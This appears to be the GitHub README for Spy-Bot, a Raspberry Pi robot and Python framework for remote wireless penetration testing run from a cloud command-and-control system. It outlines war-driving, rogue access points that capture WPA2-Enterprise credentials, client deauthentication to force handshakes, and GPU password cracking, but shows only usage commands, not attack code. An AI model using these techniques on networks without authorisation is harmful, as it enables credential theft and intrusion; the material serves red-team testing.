Spy-Bot

Spy-Bot: A Cloud Penetration Testing Approach for Wireless Penetration Testing.

View on GitHub

Spy-Bot: A Cloud Pentesting Approach

Sit back in your room and pentest wireless networks anywhere in the world over cloud!

The Spy-Bot is a robot based on a Raspberry-Pi build using Python, which can navigate and perform wireless penetration testing over the cloud. The Spy-Bot works with a Spy-Bot framework, which constitutes the source code and files needed to perform wireless penetration testing objectives using Python Scripts.

ScreenShot

ScreenShot

The SpyBot framework provides a convenient approach to perform RED-TEAM exercises aimed to perform penetration tests on wireless networks in a particular region. The framework contains remote admin scripts used by a remote admin (Admin WorkSpace) and Spy-Bot scripts used on the Raspbery-Pi (SpyBot Workspace) to perform remote wireless penetration testing over cloud.

The Spy-Bot framework contains tools developed and designed to gather geographical information regarding wireless access points, detect wifi signal leakage by plotting geo-coordinates of a wireless AP packets on google maps and perform several other attack objectives. The Spy-Bot framework sets up a database which stores information related to the wireless pentests and audits performed using the Spy-Bot.

ScreenShot

This wireless pentest framework is designed specifically to work efficiently with a raspberry-pi. The source files for performing wireless penetration testing objectives (present in the SpyBot Workspace) can also be used on a standalone individual system that runs Kali Linux or a similiar distro. The source codes have been designed and tested to work with a TP-Link WN-722N ( use SpyBotmian.py in the master branch ) and ALFA cards ( check SpyBotMain_alfa.py to work with other cards and alfa cards).

OBJECTIVES OF THE SPY-BOT:

1. Deploying the Spy-Bot:

2. Testing Attacks against WPA/WPA2/WPA-Enterprise Networks ( Objectives done using SpyBotMain.py and SpyBotMain_alfa.py)

3. Testing Attacks against WEP Networks

4. Testing Attacks against Authentication Protocols

5. Dynamically Hosting Rogue AP’s for victim clients

Using Python and hostapd to:

NEW FEATURES WILL BE ADDED SOON :) !

INSTALLATION

1.Setting up the CLOUD System/Command&Control Center

2. Setting up the Spy-Bot

USE A SUITABLE DATABASE VIEWER (SUCH AS SQLITE MANAGER FIREFOX PLUGIN) TO VIEW THE CONTENTS OF THE SPYBOT.DB DATABASE. SAMPLE FILES ARE PROVIDED.

REFER WIKI PAGE FOR MORE DETAILS & SETTING UP.

Usage

  1. The Spybotmain.py is responsible for performing the wireless pentest objectives. It can be run on a remote command and control center, or on the Spybot. Make the spybotmain.py as an executable and run with root privilages.
chmod a+x SpyBotMain.py
./Spybotmain.py <wireless-interface name>

example: ./Spybotmain.py wlan0

  1. Run the admin.py (as root) if performing objectives remotely.
chmod a+x admin.py
./admin.py
  1. Run navigation.py to control the motors of the Spy-Bot Use the arrow keys of ‘a’,’s’,’d’,’w’ to control directions. Press space key to stop.
chmod a+x navigation.py
./navigation.py

Screenshots

1. Connecting to the SpyBot.

ScreenShot

On the cloud/C2C system, execute the admin.py script (sudo/root) present in the admin_workspace directory. The admin.py allows you to connect to the SpyBot over YALER, launch GPU password attacks on pcap files and retrieves any handshake files, rogua AP login detail files etc captured by the SpyBot and stores it in the admin_workspace. NOTE: root@localhost is the default remote login prompt given to you by Yaler services, if you configure the yaler services properly for the remote connection.

2. Running the spybotmain.py

ScreenShot

Once you login to the SpyBot using the admin.py script on the cloud server/remote control system, launch the spybotmain.py in the spybot_workspace directory. The spybotmain.py runs on the raspberry-pi (Spy-Bot) to perform wireless penetration testing objectives.

3. Controlling the SpyBot remotely & war-driving over cloud

ScreenShot

Launch the navigation.py on the SpyBot in the spybot_workspace to control and navigate the spybot. Configure a VNC camera access if needed ( Check Yaler.net for further details ). The terminal 1 shows the admin.py on the C2C system. The terminal 2 shows the output for the navigation.py (present in the spybot_workspace on the remote rpi) controlling the motors on the remote Spy-Bot. The terminal 3 shows the output of spybotmain.py when a network scan is initiated. It shows a list of available wireless networks, channel numbers, etc. The ‘coordinates’ show the last seen location where an access point is detected. The ‘location’ field provides description of the coordinates using google APIs. All the collected information about the networks is stored in a database spybot.db on the SpyBot which can later be retreived at the end of a wireless recon operation.

4. Mapping access points last seen locations on a map

ScreenShot

The last seen coordinates of the access points are mapped to a google map template and is stored as a html file. Move the cursor over the blue points to show information about the Access point name, signal strength and encryption used.

5. Scanning for client probes

ScreenShot

Launch the client probe scanner using the spybotmain.py to recon the access points which are searched by network devices in the region. When a network device wants to connect to a known saved wireless network, it sends out probes to search for the networks it knows. This information can be used to set up rogue access points.

6. Rogue access points and obtaining challenge-response pairs for WPA2-Enterprise networks

ScreenShot

Launch the rogue ap launcher in the spybotmain.py to create rogue access points:

wait for victims to connect and enter credentials.(works in WPA-enterprise networks that allow authentication without certificate validation ) Launch ASLEAP functions using the admin.py AFTER retreiving the remote files from the remote spybot onto the c2c/cloud server.

ScreenShot

7. Deauth selective/all clients and force a WPA handshake

ScreenShot

Launch the wpa handshake capture in the spybotmain.py to sniff for EAPOL messages.

ScreenShot

Launch the deauth launcher in the spybotmain.py to deauthenticate all the clients or to select multiple clients to deauthenticate the clients.

8. Transfer captured handshakes, mapped APs, spybot.db to the C2C server

ScreenShot

Prepare files to send in the spybotmain.py file. Retrieve the files using the admin.py. View the contents of the spybot.db database using a suitable database viewer (like firefox SQL plugin)

ScreenShot

ScreenShot

Networks and client probes found & collected during the recon by the spybot are stored in the spybot.db database.

9. GPU crack the handshake using pyrit

Launch the GPU password attack using the admin.py on the cloud server after retreiving the sniffed handhshakes from the SpyBot.

ScreenShot

Launch the GPU password attack using the admin.py on the cloud server after retreiving the sniffed handhshakes from the SpyBot.

Similiar operations for cracking WEP networks is also provided by the framework.

Links

  1. Yaler Services & setting up yaler for remote access : https://www.yaler.net/
  2. Setting up optirun, nvidia & pyrit setup on Kali Linux: https://www.pcsuggest.com/install-latest-pyrit-0-4-with-cuda-in-kali-linux-debian/
  3. Setting up asleap: https://github.com/joswr1ght/asleap
  4. Setting up hostapd: https://w1.fi/hostapd/ (copy hostapd executable in the proper hostapd directory)

LICENSE

MIT License

Copyright (c) 2017 Aamer Shareef

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.